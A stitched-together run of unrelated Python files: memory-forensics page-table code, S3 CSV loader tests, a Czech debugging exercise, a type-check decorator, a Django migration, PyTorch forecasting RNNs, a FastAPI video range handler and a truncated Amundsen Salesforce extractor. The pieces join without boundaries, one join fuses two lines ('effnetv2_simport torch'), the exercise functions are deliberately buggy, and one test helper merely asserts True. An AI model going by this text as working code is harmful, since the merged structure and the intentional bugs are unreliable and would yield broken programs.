0x200000) else: yield (vaddr + soffset, 0x200000) elif self.entry_present(entry): pt_base = entry & 0xFFFFFFFFFF000 pt = self.base.read(pt_base, 0x200 * 8) if pt is None: continue pt_entries = struct.unpack('<512Q', pt) prev_pt_entry = None for k in range(0, 0x200): pt_entry = pt_entries[k] if self.skip_duplicate_entries and pt_entry == prev_pt_entry: continue prev_pt_entry = pt_entry if self.entry_present(pt_entry): if with_pte: yield (pt_entry, vaddr + soffset + k * 0x1000, 0x1000) else: yield (vaddr + soffset + k * 0x1000, 0x1000) @classmethod def address_mask(cls, addr): return addr & 0xffffffffffff class WindowsAMD64PagedMemory(AMD64PagedMemory): """Windows-specific AMD 64-bit address space. This class is a specialized version of AMD64PagedMemory that leverages Windows-specific paging logic. """ order = 55 def is_valid_profile(self, profile): ''' This method checks to make sure the address space is being used with a Windows profile. ''' valid = AMD64PagedMemory.is_valid_profile(self, profile) return valid and profile.metadata.get('os', 'Unknown').lower() == 'windows' def entry_present(self, entry): present = AMD64PagedMemory.entry_present(self, entry) # The page is in transition and not a prototype. # Thus, we will treat it as present. return present or ((entry & (1 << 11)) and not (entry & (1 << 10))) class SkipDuplicatesAMD64PagedMemory(WindowsAMD64PagedMemory): """Windows 8/10-specific AMD 64-bit address space. This class is used to filter out large sections of kernel mappings that are duplicates in recent versions of Windows 8/10. """ order = 53 skip_duplicate_entries = True def is_valid_profile(self, profile): ''' This address space should only be used with recent Windows 8/10 profiles ''' valid = WindowsAMD64PagedMemory.is_valid_profile(self, profile) major = profile.metadata.get('major', 0) minor = profile.metadata.get('minor', 0) return valid and major >= 6 and minor >= 2 class LinuxAMD64PagedMemory(AMD64PagedMemory): """Linux-specific AMD 64-bit address space. This class is a specialized version of AMD64PagedMemory that leverages Linux-specific paging logic. """ order = 55 def is_valid_profile(self, profile): ''' This method checks to make sure the address space is being used with a Linux profile. 
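# --- Editor's sketch of the Windows-specific rule in
# WindowsAMD64PagedMemory.entry_present above: a PTE is treated as usable when
# it is hardware-present (bit 0) or when it is "in transition" (bit 11) without
# being a prototype PTE (bit 10). `windows_entry_usable` is a hypothetical
# standalone predicate; it assumes the base-class check is simply bit 0.
def windows_entry_usable(entry):
    hardware_present = bool(entry & 1)
    transition = bool(entry & (1 << 11))
    prototype = bool(entry & (1 << 10))
    return hardware_present or (transition and not prototype)

assert windows_entry_usable(0x1)                         # present
assert windows_entry_usable(1 << 11)                     # transition, not prototype
assert not windows_entry_usable((1 << 11) | (1 << 10))   # prototype transition
assert not windows_entry_usable(0)                       # paged out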
''' valid = AMD64PagedMemory.is_valid_profile(self, profile) return valid and profile.metadata.get('os', 'Unknown').lower() == 'linux' def entry_present(self, entry): present = AMD64PagedMemory.entry_present(self, entry) # Linux pages that have had mprotect(...PROT_NONE) called on them # have the present bit cleared and global bit set return present or (entry & (1 << 8)) tests/integration/test_target_s3_csv.py import json import unittest import simplejson from nose.tools import assert_raises import target_s3_csv from target_s3_csv import s3 try: import tests.utils as test_utils except ImportError: import utils as test_utils class TestIntegration(unittest.TestCase): """ Integration Tests """ maxDiff = None def setUp(self): self.config = test_utils.get_test_config() s3.setup_aws_client(self.config) def assert_three_streams_are_in_s3_bucket(self, should_metadata_columns_exist=False, should_hard_deleted_rows=False, compression=None, delimiter=',', quotechar='"'): """ This is a helper assertion that checks if every data from the message-with-three-streams.json file is available in S3. Useful to check different loading methods (compressed, encrypted, custom delimiter and quotechar, etc.) without duplicating assertions """ # TODO: This assertion function is currently a template and not implemented # Here We should download files from S3 and compare to expected results based on the input # parameters self.assertTrue(True) def persist_messages(self, messages): """Load data into S3""" target_s3_csv.persist_messages(messages, self.config) def test_invalid_json(self): """Receiving invalid JSONs should raise an exception""" tap_lines = test_utils.get_test_tap_lines('invalid-json.json') with assert_raises(simplejson.scanner.JSONDecodeError): self.persist_messages(tap_lines) def test_message_order(self): """RECORD message without a previously received SCHEMA message should raise an exception""" tap_lines = test_utils.get_test_tap_lines('invalid-message-order.json') with assert_raises(Exception): self.persist_messages(tap_lines) def test_loading_csv_files(self): """Loading multiple tables from the same input tap with various columns types""" tap_lines = test_utils.get_test_tap_lines('messages-with-three-streams.json') self.persist_messages(tap_lines) self.assert_three_streams_are_in_s3_bucket() def test_loading_csv_files_with_gzip_compression(self): """Loading multiple tables from the same input tap with gzip compression""" tap_lines = test_utils.get_test_tap_lines('messages-with-three-streams.json') # Turning on gzip compression self.config['compression'] = 'gzip' self.persist_messages(tap_lines) self.assert_three_streams_are_in_s3_bucket(compression='gzip') def test_loading_csv_files_with_invalid_compression(self): """Loading multiple tables from the same input tap with invalid compression""" tap_lines = test_utils.get_test_tap_lines('messages-with-three-streams.json') # Turning on a not supported compression method self.config['compression'] = 'INVALID_COMPRESSION_METHOD' # Invalid compression method should raise exception with assert_raises(NotImplementedError): self.persist_messages(tap_lines) def test_naming_convention(self): tap_lines = test_utils.get_test_tap_lines('messages-with-three-streams.json') self.config['naming_convention'] = "tester/{stream}/{timestamp}.csv" self.persist_messages(tap_lines) self.assert_three_streams_are_in_s3_bucket() #!/usr/bin/python3 import sys ########################### # Dotaz studenta: # # ########################### # Chcete-li dostat odpoved, vlozte do nazvu 
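# --- Editor's illustration for the target_s3_csv tests above. test_message_order
# relies on the Singer convention that a SCHEMA message for a stream must arrive
# before any RECORD message for that stream. The real tests load fixture files
# such as messages-with-three-streams.json; the two lines below are only a
# minimal, hypothetical tap output showing that ordering.
import json
example_tap_lines = [
    json.dumps({"type": "SCHEMA", "stream": "users",
                "schema": {"properties": {"id": {"type": "integer"}}},
                "key_properties": ["id"]}),
    json.dumps({"type": "RECORD", "stream": "users", "record": {"id": 1}}),
]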
souboru heslo KONTROLA. # Tento program obsahuje velke mnozstvi chyb ruznych typu. # # Vasim ukolem je projit kod a opravit jej tak, # abyste vsechny chyby odstranili. # # Testy nemodifikujte, jsou jen pro kontrolu a to, ze vsechny # projdou neznamena, ze je vas kod bez chyby. # # Opravujte jen funkce, ktere maji v komentari TODO. # TODO: opravit tuto funkci def is_string_palindrom(string): """Testuje, zdali je zadany retezec (string) palindrom a to bez pouziti funkce reverse. Vraci True v pripade, ze je palindrom, jinak False. """ if string is None: return False i = 0 while i < len(string): if string[i] == string[len(string) -1 - i]: i+=1 continue else: return False return True class Node: """Trida Node slouzi pro reprezentaci objektu v jednosmerne spojovanem seznamu. Atributy: value reprezentuje ulozenou hodnotu/objekt next reference na nasledujici prvek v seznamu """ def __init__(self): self.value = None self.next = None class LinkedList: """Trida LinkedList reprezentuje spojovany seznam. Atributy: first reference na prvni prvek seznamu """ def __init__(self): self.first = None # TODO: opravit tuto funkci def insert(linked_list, value): """Funkce insert vklada na konec seznamu (linked_list) novy uzel s danou hodnotou (value). Vraci referenci na novy uzel seznamu. """ n = Node() n.value = value tmp = linked_list.first if linked_list.first is None: linked_list.first = n else: while tmp.next: tmp = tmp.next tmp.next = n return n # TODO: opravit tuto funkci def delete_key(linked_list, key): """Funkce delete_key smaze prvni vyskyt klice (key) v seznamu (linked_list). Vrati False pokud klic nebyl nalezen, True jinak. """ node = linked_list.first previous = None while node is not None and node.value != key: previous = node node = node.next if node is None: return False if previous is None : linked_list.first = node.next else: previous.next = node.next return True # TODO: opravit tuto funkci def multiply_numbers(bound, numbers): """Funkce vypocita soucin cisel v poli numbers, jejichz hodnota je z intervalu 1 az bound (vcetne). Pokud se v poli zadna takova cisla nenachazeji, vrati 1. Parametry: bound horni hranice intervalu pro hodnotu cisel, ktera se zapocitavaji do vysledku numbers pole cisel k pocitani soucinu """ array = [0 for i in range(bound)] for i in range(len(numbers)): array[numbers[i]] += 1 val = 1 for i in range(len(array)): for j in range(array[i]): val *= i return val # TODO: opravit tuto funkci def has_correct_parentheses(string): """Funkce otestuje, zdali zadany retezec obsahuje spravne ozavorkovani, tedy pred kazdou uzaviraci zavorkou musi byt prislusna oteviraci. Resi se pouze zavorky ( ). Vraci True v pripade spravneho ozavorkovani, jinak False. """ opened = 0 for i in range(len(string)): if string[i] == '(': opened += 1 if string[i] == ')': opened -= 1 if opened == 0: return True return False # TODO: opravit tuto funkci def sequence_sum(sequence): """Funkce secte "sumu" posloupnosti (sequence) a to tak, ze pokud je cislo vetsi nez predchazejici (sequence[n] > sequence[n-1]), tak ho pricte k "sume", pokud je sequence[n] < sequence[n-1], tak ho odecte a pokud je stejne, tak ho preskoci. Prvni cislo se nezapocita. """ strange_sum = 0 for i in range(len(sequence)): if sequence[i] > sequence[i-1]: strange_sum += sequence[i] if sequence[i] < sequence[i-1]: strange_sum -= sequence[i] return strange_sum # TODO: opravit tuto funkci def find_substring(string, substring): """Funkce hleda podretezec (substring) v retezci (string). 
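# --- Editor's sketch, not the official solution to the exercise above: one
# possible corrected has_correct_parentheses. The balance of open brackets must
# never go negative and must end at zero; the buggy version returns as soon as
# the balance reaches zero. The asserts mirror tests 13-16 below.
def has_correct_parentheses_fixed(string):
    opened = 0
    for ch in string:
        if ch == '(':
            opened += 1
        elif ch == ')':
            opened -= 1
            if opened < 0:      # a closing bracket with no matching opening one
                return False
    return opened == 0

assert has_correct_parentheses_fixed("()")
assert not has_correct_parentheses_fixed(")(")
assert has_correct_parentheses_fixed("aaa")
assert not has_correct_parentheses_fixed("((")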
Pokud se podretezec v retezci nachazi, vrati index prvniho vyskytu. Jinak vraci -1. """ if len(substring) > len(string): return -1 j = 1 i = 1 while i < len(string): if string[i] == substring[j]: if j == (len(substring) - 1): return i - j j += 1 i += 1 return -1 # Testy implmentace def test_palindrom(): print("Test 1: je \"abccba\" palindrom?") try: res = is_string_palindrom("abccba") if res: print("OK.") else: print("NOK, \"abccba\" je palindrom, ale program vraci 0.") except IndexError as e: print("NOK: pristup mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) print("Test 2: je \"abcba\" palindrom?") try: res = is_string_palindrom("abcba") if res: print("OK.") else: print("NOK, \"abcba\" je palindrom, ale program vraci 0.") except IndexError as e: print("NOK: pristup mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) print("Test 3: je \"abcabc\" palindrom?") try: res = is_string_palindrom("abcabc") if res: print("NOK, \"abcabc\" neni palindrom, ", end="") print("ale program vraci 1.") else: print("OK.") except IndexError as e: print("NOK: pristup mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) def test_list(): try: l1 = LinkedList() l1.first = None print("Test 4: vkladani 1. prvku do listu.") tmp1 = insert(l1, 1) if tmp1.value == 1 and l1.first is tmp1 and tmp1.next is None: print("OK.") else: print("NOK, vlozeni prvniho prvku neprobehlo v poradku, ", end="") print("zkontrolujte, zdali je spravne nastavena hodnota ", end="") print("a reference next.") except AttributeError as e: print("NOK: spatna prace s pameti.") print("Chybova hlaska Pythonu: {}".format(e)) try: print("Test 5: vkladani 2. prvku do listu.") l2 = LinkedList() tmp21 = insert(l2, 1) tmp22 = insert(l2, 2) if (tmp22.value == 2 and l2.first is tmp21 and tmp22.next is None and tmp21.next is tmp22): print("OK.") else: print("NOK, vlozeni druheho prvku neprobehlo v poradku, ", end="") print(" zkontrolujte, zdali je spravne nastavena hodnota", end="") print(" a reference next.") except AttributeError as e: print("NOK: spatna prace s pameti.") print("Chybova hlaska Pythonu: {}".format(e)) try: print("Test 6.1: odstraneni 2. 
prvku z listu.") l3 = LinkedList() tmp31 = insert(l3, 1) tmp32 = insert(l3, 2) if delete_key(l3, 2) and tmp31.next is None: print("OK.") else: print("NOK, neodstranili jste prvek, ", end="") print("muze to byt dano i spatnym vkladanim.") except AttributeError as e: print("NOK: spatna prace s pameti.") print("Chybova hlaska Pythonu: {}".format(e)) try: print("Test 6.2: odstraneni prvku z prazdneho listu.") l3 = LinkedList() if delete_key(l3, 2): print("NOK, odstranili jste prvek z prazdneho listu ", end="") print("a nebo vratili True") else: print("OK.") except AttributeError as e: print("NOK: spatna prace s pameti.") print("Chybova hlaska Pythonu: {}".format(e)) try: print("Test 6.3: odstraneni chybejiciho prvku z listu.") l3 = LinkedList() tmp31 = insert(l3, 1) tmp32 = insert(l3, 2) if delete_key(l3, 4): print("NOK, odstranili jste prvek, ktery v listu nebyl ", end="") print("a nebo vratili True") else: print("OK.") except AttributeError as e: print("NOK: spatna prace s pameti.") print("Chybova hlaska Pythonu: {}".format(e)) def test_multiply_numbers(): print("Test 7: multiply_numbers(1, [1, 1, 1])") try: res = multiply_numbers(1, [1, 1, 1]) if res is not 1: print("NOK: {} != 1".format(str(res))) else: print("OK.") except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) print("Test 8: multiply_numbers(2, [3, 3, 3])") try: res = multiply_numbers(2, [3, 3, 3]) if res is not 1: print("NOK: {} != 1".format(str(res))) else: print("OK.") except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) print("Test 9: multiply_numbers(3, [1, 1, 2])") try: res = multiply_numbers(3, [1, 1, 2]) if res is not 2: print("NOK: {} != @".format(str(res))) else: print("OK.") except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) print("Test 10: multiply_numbers(3, [1, 4, 3])") try: res = multiply_numbers(3, [1, 4, 3]) if res is not 3: print("NOK: {} != 3".format(str(res))) else: print("OK.") except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) print("Test 11: multiply_numbers(4, [3, 3, 3, 2])") try: res = multiply_numbers(4, [3, 3, 3, 2]) if res is not 54: print("NOK: " + str(res) + " != 54") else: print("OK.") except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) print("Test 12: multiply_numbers(3, [3, 3, 4])") try: res = multiply_numbers(3, [3, 3, 4]) if res is not 9: print("NOK: {} != 9".format(str(res))) else: print("OK.") except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) def test_brackets(): print("Test 13: zavorkovani na \"()\"") try: if has_correct_parentheses("()"): print("OK.") else: print("NOK, \"()\" je spravne uzavorkovani a funkce vrati False") except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) print("Test 14: zavorkovani na \")(\"") try: if has_correct_parentheses(")("): print("NOK, \")(\" neni spravne uzavorkovani a funkce vrati True") else: print("OK.") except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) print("Test 15: zavorkovani na \"aaa\"") try: if has_correct_parentheses("aaa"): print("OK.") else: print("NOK, \"aaa\" je spravne uzavorkovani a funkce vrati False") except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: 
{}".format(e)) print("Test 16: zavorkovani na \"((\"") try: if has_correct_parentheses("(("): print("NOK, \"((\" neni spravne uzavorkovani a funkce vrati True") else: print("OK.") except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) def test_sequence_sum(): print("Test 17: sequence_sum([1, 2, 3])") try: res = sequence_sum([1, 2, 3]) if res == 5: print("OK.") else: print("NOK, sequence_sum([1, 2, 3]) je 5 ", end="") print("a vam vyslo {}".format(str(res))) except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) print("Test 18: sequence_sum([1, 2, 1])") try: res = sequence_sum([1, 2, 1]) if res == 1: print("OK.") else: print("NOK, sequence_sum([1, 2, 1]) je 1 ", end="") print("a vam vyslo {}".format(str(res))) except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) print("Test 18: sequence_sum([1,2,2])") try: res = sequence_sum([1, 2, 2]) if res == 2: print("OK.") else: print("NOK, sequence_sum([1, 2, 2]) je 2 ", end="") print("a vam vyslo {}".format(str(res))) except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) def test_find(): print("Test 19: je v \"abc\" podretezec \"abc\"?") try: res = find_substring("abc", "abc") if res == 0: print("OK.") else: print("NOK, podretezec je na pozici 0, ", end="") print("vy vracite {}".format(str(res))) except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) print("Test 20: je v \"abc\" podretezec \"b\"?") try: res = find_substring("abc", "b") if res == 1: print("OK.") else: print("NOK, podretezec je na pozici 1, ", end="") print("vy vracite {}".format(str(res))) except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) print("Test 21: je v \"abc\" podretezec \"abb\"?") try: res = find_substring("abc", "abb") if res == -1: print("OK.") else: print("NOK, podretezec zde neni, vy vracite {}".format(str(res))) except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) print("Test 22: je v \"aaab\" podretezec \"aab\"?") try: res = find_substring("aaab", "aab") if res == 1: print("OK.") else: print("NOK, podretezec je na pozici 1, ", end="") print("vy vracite {}".format(str(res))) except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) if __name__ == '__main__': test_palindrom() test_list() test_multiply_numbers() test_brackets() test_sequence_sum() test_find() print("Testy netestuji vse. Pokud vam tedy prosly vsude na OK,") print("neznamena to, ze mate bezchybnou implementaci. To, ze") print("je nejaky test NOK ale znamena, ze mate neco spatne.")#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Fri Aug 25 14:55:27 2017 @author: misakawa """ class Typedef: def __init__(self, type_, error_msg = "Type of {return_or_input} {idx_or_key} should be {type}." 
): self.type_ = type_ self.error_msg = error_msg def set_lambda(self, dual_callable_obj): self.check = lambda input_var: dual_callable_obj(input_var, self.type_) return self NEq = lambda type_: Typedef(type_, error_msg="Type of {return_or_input} {idx_or_key} shouldn't be {type}.").set_lambda( lambda input_var, input_type : not isinstance(input_var, input_type) ) Or = lambda *type_:Typedef(type_, error_msg="Type of {return_or_input} {idx_or_key} should be in {type}").set_lambda( lambda input_var, input_type: input_var.__class__ in input_type ) def error_helper(template_msg, **kwargs): template = template_msg+'\n'+"The type of current input {return_or_input} is {input_var_type}." return template.format(**kwargs) def _check(input_var, check_type, idx = None, key = None, ret = None): return_or_input = lambda :"return" if ret else "argument" error_render = lambda :dict(idx_or_key = key if key else idx, return_or_input = return_or_input(), type = _type, input_var_type = input_var.__class__) if isinstance(check_type, Typedef): _type = check_type.type_ if not check_type.check(input_var): raise TypeError(error_helper(check_type.error_msg, **error_render())) else: _type = check_type if not isinstance(input_var, check_type): raise TypeError(error_helper("Type of {return_or_input} {idx_or_key} should be {type}.", **error_render())) class strict: def __new__(self): return strict def args(*typeargs : "*[, typearg]" , **typekwargs : "**dict(, kw = arg)"): def _1(func): def _2(*args, **kwargs): for arg_idx, (arg,typearg) in enumerate(zip(args, typeargs)): try: _check(arg, typearg, idx=arg_idx) except TypeError as e: raise TypeError(e) for key in kwargs: try: _check(kwargs[key], typekwargs[key], key=key) except TypeError as e: raise TypeError(e) return func(*args,**kwargs) return _2 return _1 def ret(*typerets : "*[, typearg]"): def _1(func): def _2(*args, **kwargs): ret = func(*args, **kwargs) if len(typerets) > 1: for ret_idx,(ret_i, typeret) in enumerate(zip(ret, typerets)): try: _check(ret_i, typeret, idx=ret_idx) except TypeError as e: raise TypeError(e) else: try: _check(ret, typerets[0], idx=0) except TypeError as e: raise TypeError(e) return ret return _2 return _1 # Generated by Django 2.0.4 on 2018-07-30 09:30 from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Address', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('raw', models.CharField(blank=True, max_length=400, null=True)), ('raw2', models.CharField(blank=True, max_length=400, null=True)), ('address_line', models.CharField(blank=True, max_length=400, null=True)), ('city_state', models.CharField(blank=True, max_length=400, null=True)), ('lat', models.FloatField(blank=True, null=True, verbose_name='lat')), ('lng', models.FloatField(blank=True, null=True, verbose_name='lng')), ], ), migrations.CreateModel( name='AddressComponent', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('long_name', models.CharField(max_length=400)), ('short_name', models.CharField(max_length=400)), ], ), migrations.CreateModel( name='AddressComponentType', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=100)), ], ), migrations.AddField( model_name='addresscomponent', name='types', 
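# --- Editor's sketch of how a runtime type-checking decorator like strict.args
# above is meant to be used. This is a self-contained miniature of the same
# idea, not the module's API; `check_args`, `wrapper` and `add` are hypothetical
# names.
def check_args(*expected_types):
    def decorate(func):
        def wrapper(*args, **kwargs):
            for i, (value, expected) in enumerate(zip(args, expected_types)):
                if not isinstance(value, expected):
                    raise TypeError(
                        "argument %d should be %r, got %r"
                        % (i, expected, type(value)))
            return func(*args, **kwargs)
        return wrapper
    return decorate

@check_args(int, int)
def add(a, b):
    return a + b

add(1, 2)        # passes the check
# add(1, "2")    # would raise TypeError: argument 1 should be <class 'int'>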
field=models.ManyToManyField(to='google_address.AddressComponentType'), ), migrations.AddField( model_name='address', name='address_components', field=models.ManyToManyField(to='google_address.AddressComponent'), ), ] from .efficientnetv2 import effnetv2_l, effnetv2_m, effnetv2_xl, effnetv2_simport torch import torch.nn as nn class EncoderRNN(nn.Module): def __init__(self, input_size, num_hidden): super(EncoderRNN, self).__init__() self.num_hidden = num_hidden self.input_size = input_size self.encoder1 = nn.GRUCell(input_size, self.num_hidden) def forward(self, input): context = torch.zeros( input.size(0), self.num_hidden, dtype=torch.float, device=input.device ) forecast_sequence = input.size()[1] for i in range(forecast_sequence): inp = input[:, i, :] context = self.encoder1(inp, context) return context class DecoderRNN(nn.Module): def __init__(self, input_size, output_size, num_hidden, use_embedding=False): super(DecoderRNN, self).__init__() self.num_hidden = num_hidden self.input_size = input_size self.output_size = output_size self.use_embedding = use_embedding self.decoder1 = nn.GRUCell(int(self.num_hidden / 2), self.num_hidden) h = self.num_hidden if use_embedding else self.num_hidden // 2 self.decoder2 = nn.GRUCell(h, self.num_hidden) self.fc_in = nn.Linear(self.num_hidden, self.input_size) self.fc_out = nn.Linear(self.num_hidden, self.output_size) self.relu_context = nn.ReLU() self.relu_output = nn.ReLU() self.relu_dla_features = nn.ReLU() self.context_encoder = nn.Linear(self.num_hidden, int(self.num_hidden / 2)) self.dla_encoder = nn.Linear(self.num_hidden // 2, int(self.num_hidden / 2)) def forward(self, context, dla_features=None, future_length=5, past_length=10): outputs = [] # Fully connected encoded_context = self.context_encoder(context) # Relu encoded_context = self.relu_context(encoded_context) result = [] # generate input decoded_inputs = [] h_t = context for i in range(past_length - 1, -1, -1): h_t = self.decoder1(encoded_context, h_t) input = self.fc_in(h_t) # decoded_inputs.insert(0, input) decoded_inputs += [input] decoded_inputs = torch.stack(decoded_inputs, 1) result.append(decoded_inputs) if self.use_embedding: # encoded_dla_features = self.dla_encoder(dla_features) # encoded_dla_features = self.relu_dla_features(encoded_dla_features) encoded_context = torch.cat((encoded_context, dla_features), 1) h_t = context # forecast for i in range(future_length): h_t = self.decoder2(encoded_context, h_t) output = self.fc_out(self.relu_output(h_t)) outputs += [output] outputs = torch.stack(outputs, 1) result.append(outputs) return result class Cumsum(nn.Module): def forward(self, last, pred): # cumsum cs = last + torch.cumsum(pred, dim=1) return cs class ForeCastRNN(nn.Module): def __init__( self, input_size, output_size, future_length, num_hidden, use_embedding=False ): super(ForeCastRNN, self).__init__() self.num_hidden = num_hidden self.input_size = input_size self.output_size = output_size self.future_length = future_length self.use_embedding = use_embedding self.encoder = EncoderRNN(self.input_size, self.num_hidden) self.decoder = DecoderRNN( input_size, output_size, self.num_hidden, self.use_embedding ) self.final = Cumsum() def forward(self, prev_bboxes, features=None): context = self.encoder(prev_bboxes) past_length = prev_bboxes.shape[1] output = self.decoder( context, features, self.future_length, past_length=past_length ) last = prev_bboxes[:, -1:, :4] output[-1] = self.final(last, output[-1]) return output import os from typing import Tuple, BinaryIO from fastapi 
import HTTPException, status from fastapi.requests import Request from fastapi.responses import StreamingResponse def send_bytes_range_requests( file_obj: BinaryIO, start: int, end: int, chunk_size: int = 10_000 ): """Send a file in chunks using Range Requests specification RFC7233 `start` and `end` parameters are inclusive due to specification """ with file_obj as f: f.seek(start) while (pos := f.tell()) <= end: read_size = min(chunk_size, end + 1 - pos) yield f.read(read_size) def _get_range_header(range_header: str, file_size: int) -> Tuple[int, int]: def _invalid_range(): return HTTPException( status.HTTP_416_REQUESTED_RANGE_NOT_SATISFIABLE, detail=f"Invalid request range (Range:{range_header!r})", ) try: h = range_header.replace("bytes=", "").split("-") start = int(h[0]) if h[0] != "" else 0 end = int(h[1]) if h[1] != "" else file_size - 1 except ValueError: raise _invalid_range() if start > end or start < 0 or end > file_size - 1: raise _invalid_range() return start, end class VideoResponse(StreamingResponse): def __init__(self, request: Request, file_path: str, content_type: str): """Returns StreamingResponse using Range Requests of a given file""" file_size = os.stat(file_path).st_size range_header = request.headers.get("range") headers = { "content-type": content_type, "accept-ranges": "bytes", "content-encoding": "identity", "content-length": str(file_size), "access-control-expose-headers": ( "content-type, accept-ranges, content-length, " "content-range, content-encoding" ), } start = 0 end = file_size - 1 status_code = status.HTTP_200_OK if range_header is not None: start, end = _get_range_header(range_header, file_size) size = end - start + 1 headers["content-length"] = str(size) headers["content-range"] = f"bytes {start}-{end}/{file_size}" status_code = status.HTTP_206_PARTIAL_CONTENT super().__init__( send_bytes_range_requests(open(file_path, mode="rb"), start, end), headers=headers, status_code=status_code, ) # Copyright Contributors to the Amundsen project. 
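# --- Editor's illustration of the Range arithmetic performed by
# _get_range_header and VideoResponse above: parse "bytes=start-end", default
# the missing bound, and derive Content-Range plus the partial content length.
# `content_range_for` is a hypothetical helper, standalone arithmetic only.
def content_range_for(range_header, file_size):
    first, last = range_header.replace("bytes=", "").split("-")
    start = int(first) if first else 0
    end = int(last) if last else file_size - 1
    return start, end, "bytes %d-%d/%d" % (start, end, file_size), end - start + 1

assert content_range_for("bytes=500-999", 10_000) == (500, 999, "bytes 500-999/10000", 500)
assert content_range_for("bytes=9500-", 10_000) == (9500, 9999, "bytes 9500-9999/10000", 500)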
# SPDX-License-Identifier: Apache-2.0 import logging from typing import ( Any, Dict, Iterator, List, Union, ) from pyhocon import ConfigTree from simple_salesforce import Salesforce from databuilder.extractor.base_extractor import Extractor from databuilder.models.table_metadata import ColumnMetadata, TableMetadata LOGGER = logging.getLogger(__name__) class SalesForceExtractor(Extractor): """ Extracts SalesForce objects """ # CONFIG KEYS CLUSTER_KEY = 'cluster_key' SCHEMA_KEY = 'schema_key' DATABASE_KEY = 'database_key' OBJECT_NAMES_KEY = "object_names" USERNAME_KEY = "username" PASSWORD_KEY = "password" SECURITY_TOKEN_KEY = "security_token" def init(self, conf: ConfigTree) -> None: self._cluster: str = conf.get_string(SalesForceExtractor.CLUSTER_KEY, "gold") self._database: str = conf.get_string(SalesForceExtractor.DATABASE_KEY) self._schema: str = conf.get_string(SalesForceExtractor.SCHEMA_KEY) self._object_names: List[str] = conf.get_list(SalesForceExtractor.OBJECT_NAMES_KEY, []) self._client: Salesforce = Salesforce( username=conf.get_string(SalesForceExtractor.USERNAME_KEY), password=conf.get_string(SalesForceExtractor.PASSWORD_KEY), security_token=conf.get_string(SalesForceExtractor.SECURITY_TOKEN_KEY), ) self._extract_iter: Union[None, Iterator] = None def extract(self) -> Union[TableMetadata, None]: if not self._extract_iter: self._extract_iter = self._get_extract_iter() try: return next(self._extract_iter) except StopIteration: return None def _get_extract_iter(self) -> Iterator[TableMetadata]: """ Extract the TableMetaData for each SalesForce Object :return: """ # Filter the sobjects if `OBJECT_NAMES_KEY` is set otherwise return all sobjects = [ sobject for sobject in self._client.describe()["sobjects"] if (len(self._object_names) == 0 or sobject["name"] in self._object_names) ] for i, sobject in enumerate(sobjects): object_name = sobject["name"] logging.info( f"({i+1}/{len(sobjects)}) Extracting SalesForce object ({object_name})" ) data = self._client.restful(path=f"sobjects/{object_name}/describe") yield self._extract_table_metadata(object_name=object_name, data=data) def _extract_table_metadata( self, object_name: str, data: Dict[str, Any] ) -> TableMetadata: # sort the fields by name because Amundsen requires a sort order for the columns and I did # not see one in the response fields = sorted(data["fields"], key=lambda x: x["name"]) columns = [ ColumnMetadata( name=f["name"], description=f["inlineHelpText"], col_type=f["type"], sort_order=i, ) for i, f in enumerate(fields) ] return TableMetadata( database=self._database, cluster=self._cluster, schema=self._schema, name=object_name, # TODO: Can we extract table description / does it exist? 
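# --- Editor's sketch of the extract() pattern used by SalesForceExtractor
# above: build the record iterator lazily on the first call and map
# StopIteration to None, which the databuilder loop treats as "no more records".
# `ToyExtractor` is a hypothetical miniature, not the databuilder base class.
class ToyExtractor:
    def __init__(self, records):
        self._records = records
        self._iter = None

    def extract(self):
        if self._iter is None:
            self._iter = iter(self._records)   # created on first call only
        try:
            return next(self._iter)
        except StopIteration:
            return None

toy = ToyExtractor(["table_a", "table_b"])
assert [toy.extract(), toy.extract(), toy.extract()] == ["table_a", "table_b", None]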
